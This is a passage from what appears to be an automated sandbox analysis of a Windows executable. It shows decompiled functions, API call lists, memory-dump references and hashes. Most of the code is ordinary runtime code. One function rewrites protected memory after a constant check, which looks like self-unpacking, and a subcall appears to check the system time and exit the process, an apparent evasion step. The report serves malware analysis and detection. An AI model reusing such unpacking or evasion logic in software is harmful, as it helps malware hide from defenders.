				L004013CC();
				if( *0x48f049 != 0) {
					_push(0x48f5c4);
					L004013D4();
				}
				E0040143C(0x48f5e4);
				E0040143C(0x48f5f4);
				E0040143C(0x48f620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x48f61c = _t11;
				if( *0x48f61c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x48f61c; // 0x84ec80
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x48f608)) = 0x48f604;
					 *0x48f604 = 0x48f604;
					 *0x48f610 = 0x48f604;
					 *0x48f5bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B35);
				if( *0x48f049 != 0) {
					_push(0x48f5c4);
					L004013DC();
					return 0;
				}
				return 0;
			}

0x00401a7d
0x00401a7e
0x00401a83
0x00401a86
0x00401a89
0x00401a8e
0x00401a9a
0x00401a9c
0x00401aa1
0x00401aa1
0x00401aab
0x00401ab5
0x00401abf
0x00401acb
0x00401ad0
0x00401adc
0x00401ade
0x00401ae3
0x00401ae3
0x00401aeb
0x00401aef
0x00401af0
0x00401afc
0x00401aff
0x00401b01
0x00401b06
0x00401b06
0x00401b0f
0x00401b12
0x00401b15
0x00401b21
0x00401b23
0x00401b28
0x00000000
0x00401b28
0x00401b2d

APIs

RtlInitializeCriticalSection.KERNEL32(0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
RtlEnterCriticalSection.KERNEL32(0048F5C4,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
LocalAlloc.KERNEL32(00000000,00000FF8,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401B35,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: a9421c50b1c25fc8bfbbbfaf9629a50131ce816a9e0b5b930daf26e2f6b34203
Instruction ID: dc321342bc449cc15bb6ac2eae4965e175d76143ccaee218c8dc981e641ee4e5
Opcode Fuzzy Hash: a9421c50b1c25fc8bfbbbfaf9629a50131ce816a9e0b5b930daf26e2f6b34203
Instruction Fuzzy Hash: 0601ADB0A042406EE715BFAAA806B1D7AD0D749304F50883FE000F66F3E7BC445ACB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00426A8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00426A8C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x48fabc == 0) {
					 *0x48fa94 = E004269A4(0, _t8,  *0x48fa94, _t17, _t18);
					_t7 =  *0x48fa94(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x00426a90
0x00426a9a
0x00426aae
0x00426ab4
0x00000000
0x00426ab4
0x00426abc
0x00426ac4
0x00426ac4
0x00426ac7
0x00426adb
0x00426ac9
0x00426ac9
0x00426adf
0x00426acb
0x00426acb
0x00426acb
0x00426acc
0x00426ae3
0x00426ace
0x00426acf
0x00426ad2
0x00426ad4
0x00426ad4
0x00426ad2
0x00426acc
0x00426ac9
0x00426ae8
0x00426aeb
0x00426af5
0x00426aed
0x00000000
0x00426aee

APIs

GetSystemMetrics.USER32 ref: 00426AEE

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

KiUserCallbackDispatcher.NTDLL ref: 00426AB4

Strings

GetSystemMetrics, xrefs: 00426A9C

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: f85df037eac8666acdef31861146caafc0f08f6d46f15898e948c7cd1ce4f54c
Instruction ID: 22a65f47129e67c00ee194768dcff261046473d558685a6e18173ebbc9bd789b
Opcode Fuzzy Hash: f85df037eac8666acdef31861146caafc0f08f6d46f15898e948c7cd1ce4f54c
Instruction Fuzzy Hash: 4AF0F0303241714ADF004A34BD806273A49A783330FE2CA3BE926AAAD0C6BDCC45C35E

Uniqueness

Uniqueness Score: -1.00%

Function 00402164, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401A78: RtlInitializeCriticalSection.KERNEL32(0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
Part of subcall function 00401A78: RtlEnterCriticalSection.KERNEL32(0048F5C4,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
Part of subcall function 00401A78: LocalAlloc.KERNEL32(00000000,00000FF8,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
Part of subcall function 00401A78: RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401B35,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28

RtlEnterCriticalSection.KERNEL32(0048F5C4,00000000,004022E0), ref: 004021AF
RtlLeaveCriticalSection.KERNEL32(0048F5C4,004022E7), ref: 004022DA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 7115dbca6965dd4d7ad70399d23df8d5d88d45a4b7b3bb23bc84f602b0167d13
Instruction ID: d987da5912d98529dea970c121a90ca755c544ff81432407de5aa6ed45f2cd0f
Opcode Fuzzy Hash: 7115dbca6965dd4d7ad70399d23df8d5d88d45a4b7b3bb23bc84f602b0167d13
Instruction Fuzzy Hash: EA41E4B2A04200DFD714CFA9EE8562DB7A0EB55318B2446BFD401E77E1E3789946CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004569B0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004569B0(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x471bb4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x48f714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00456A68(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x004569b4
0x004569c2
0x004569c5
0x004569ca
0x004569cf
0x004569d2
0x004569dc
0x004569e6
0x00000000
0x00000000
0x00000000
0x004569de
0x004569de
0x004569de
0x004569de
0x004569ec
0x004569f7
0x004569fc
0x004569fd
0x00456a00
0x00456a09

APIs

LoadCursorA.USER32 ref: 004569BD
LoadCursorA.USER32 ref: 004569EC

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: d6de00b65071e09e2690aaf7b03e08efc0fb2c24a8d0773775e60b849ccbb120
Instruction ID: a68e30bfcb635300f7ac1b644cbf0b244a91819071521e29b99e579d6b5154fd
Opcode Fuzzy Hash: d6de00b65071e09e2690aaf7b03e08efc0fb2c24a8d0773775e60b849ccbb120
Instruction Fuzzy Hash: 03F08261A00254179660163E5CD1A6B72589F82336B62033FFD2AD72E3DA395C499269

Uniqueness

Uniqueness Score: -1.00%

Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401590(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401444(0x48f5e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401593
0x0040159d
0x004015ac
0x0040159f
0x0040159f
0x0040159f
0x004015b2
0x004015bf
0x004015c4
0x004015c6
0x004015ca
0x004015d3
0x004015da
0x004015e6
0x004015ed
0x00000000
0x004015ed
0x004015da
0x004015f2

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 514d9c6073d95a7fd889d2da4666c4dab7fb463a216ba28fc7f0d49a2089cc71
Instruction ID: fe368054362886feb3db4b393798dcf367e510bfad46e737d7199c7e75bcba1b
Opcode Fuzzy Hash: 514d9c6073d95a7fd889d2da4666c4dab7fb463a216ba28fc7f0d49a2089cc71
Instruction Fuzzy Hash: 71F02772F002202BEB20696A4CC1F4366C59FC5790F180177FA08FF3E9D6798C0043A9

Uniqueness

Uniqueness Score: -1.00%

Function 004703F8, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004703F8(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E004703B0( *((intOrPtr*)( *_t31))) == 0) {
					if(E004703E4( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x4703a0;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa4) ^ 0x00073edc) != 0x4cb23) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xb0), 0x15835, 4,  &_v8); // executed
				E004704E0(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xb0)), 0x15835, __edi, __esi, 0x1c6f0, 0x471d68);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x2dd7;
				return _t29 | 0xffffffff;
			}

0x004703fd
0x0047040b
0x0047047d
0x00000000
0x00470492
0x00470487
0x00000000
0x0047048d
0x0047040d
0x00470422
0x00000000
0x0047046e
0x00470438
0x00470457
0x0047045c
0x0047045f
0x00000000

APIs

Part of subcall function 004703B0: GetSystemTime.KERNEL32 ref: 004703B7
Part of subcall function 004703B0: ExitProcess.KERNEL32(00000000), ref: 004703C6
Part of subcall function 004703B0: 6D8725A0.OPENGL32(00000000), ref: 004703D8

VirtualProtectEx.KERNEL32(000000FF,?,00015835,00000004,?), ref: 00470438

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: D8725ExitProcessProtectSystemTimeVirtual
String ID:
API String ID: 1856064926-0
Opcode ID: ee49645b592d19a6818cabc570a6b2e80f98111c8c2ee7b9a03dc5db58d731a8
Instruction ID: 2c80a5514cda9617734d89195dc93e2807661e808fd56c8279d293839e776d7e
Opcode Fuzzy Hash: ee49645b592d19a6818cabc570a6b2e80f98111c8c2ee7b9a03dc5db58d731a8
Instruction Fuzzy Hash: 12113C34215200DFD750DB24C981EA673A5AF85324F14C2B6AA189F396DA78EC41CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040728A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040728A(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x004072b5
0x004072bc

APIs

CreateWindowExA.USER32 ref: 004072B5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 89ec8fafd779a4f510c7dc37850e4db6278f995c39f73d931340cda5e2e40546
Instruction ID: 108bb5fc50b6e5823d5570ef7878ae84b760d967d62aca15d66f8c04c0ffcf35
Opcode Fuzzy Hash: 89ec8fafd779a4f510c7dc37850e4db6278f995c39f73d931340cda5e2e40546
Instruction Fuzzy Hash: 7BE0FEB2244209BFEB00DE8ADDC1DABB7ACFB4C654F814115BB1C97242D675AC608B75

Uniqueness

Uniqueness Score: -1.00%

Function 0040728C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040728C(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x004072b5
0x004072bc

APIs

CreateWindowExA.USER32 ref: 004072B5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4adc99ed55311126ab1ca61859c8c3750e42c7b312ff2ba14b9157c054dade66
Instruction ID: d219aed579f78b2e9c95331c08286bed8e598a722e81b5c9ca34401c87b76ed6
Opcode Fuzzy Hash: 4adc99ed55311126ab1ca61859c8c3750e42c7b312ff2ba14b9157c054dade66
Instruction Fuzzy Hash: 58E0FEB2244209BBEB00DE8ADDC1DABB7ACFB4C654F814115BB1C972428675AC608B75

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A3C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405C78(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405a44
0x00405a4a
0x00405a56
0x00405a5a
0x00405a63
0x00405a68
0x00405a6a
0x00405a6f
0x00405a71
0x00405a74
0x00405a74
0x00405a6f
0x00405a77
0x00405a82

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?,00000400,?,00410470,0041407F,00000000,004140A4), ref: 00405A5A

Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?), ref: 00405C94
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C), ref: 00405CD0
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction ID: eb3007f67f035d8ae6987e39c34b1bfc81debd44418eda91f1e8b5ec37918a95
Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction Fuzzy Hash: 7AE03971A006188BCB10DE6888C1A973398AB08754F4006A6AD54EF386D374D9108F94

Uniqueness

Uniqueness Score: -1.00%

Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x48f5e4; // 0x84e364
				while(_t29 != 0x48f5e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x0040172b
0x0040172f
0x00401736
0x0040174b
0x00401753
0x00401759
0x0040175f
0x00401762
0x004017a6
0x0040176a
0x00401770
0x00401774
0x00401776
0x00401776
0x0040177c
0x0040177e
0x0040177e
0x00401784
0x00401791
0x00401798
0x0040179a
0x004017a0
0x00000000
0x004017a0
0x00401798
0x004017a4
0x004017a4
0x004017b5

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: afbc9eaa895e3e39448bee3130202f419427eff59d90178ec687e4b5fd235349
Instruction ID: 43c0cd8182e11655965b4a28ce9b3d8169f37dad9e43c7878f848ef0a0e78916
Opcode Fuzzy Hash: afbc9eaa895e3e39448bee3130202f419427eff59d90178ec687e4b5fd235349
Instruction Fuzzy Hash: BC117C7AA046019FC3109F29C980A1BB7E5EFC4760F15C63EE598A73A5D639AC408B89

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDB0, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CDB0(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x48fa20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x48fa1c; // 0x7a0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402994(0x4714bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041CDA8(_t2, E0041CD88);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041CDA8(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x48fa20;
						 *0x48fa20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x48fa1c = _t35;
				}
				_t25 =  *0x48fa20;
				 *0x48fa20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x48fa20;
			}

0x0041cdbe
0x0041cdce
0x0041cdd3
0x0041cdd5
0x0041cdda
0x0041cddc
0x0041cde9
0x0041cdf3
0x0041cdfb
0x0041cdfe
0x0041cdfe
0x0041ce01
0x0041ce01
0x0041ce04
0x0041ce0e
0x0041ce13
0x0041ce16
0x0041ce18
0x0041ce1f
0x0041ce26
0x0041ce26
0x0041ce2e
0x0041ce33
0x0041ce38
0x0041ce3e
0x0041ce45

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041CDCE

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 137d51fb405133eaef39d3aa0dad868edf6e18bb3f5f7bf3006fc37a246a785e
Instruction ID: 202082514fdac41c38a9e5e9c68aab4eaf1bc166bcd1626add94992ae5d6a61e
Opcode Fuzzy Hash: 137d51fb405133eaef39d3aa0dad868edf6e18bb3f5f7bf3006fc37a246a785e
Instruction Fuzzy Hash: C91148742403058BD720DF19DCC1B86FBE5EF88360F10C53AE9999B785D378E9558BA8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00443C20, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00443C20() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
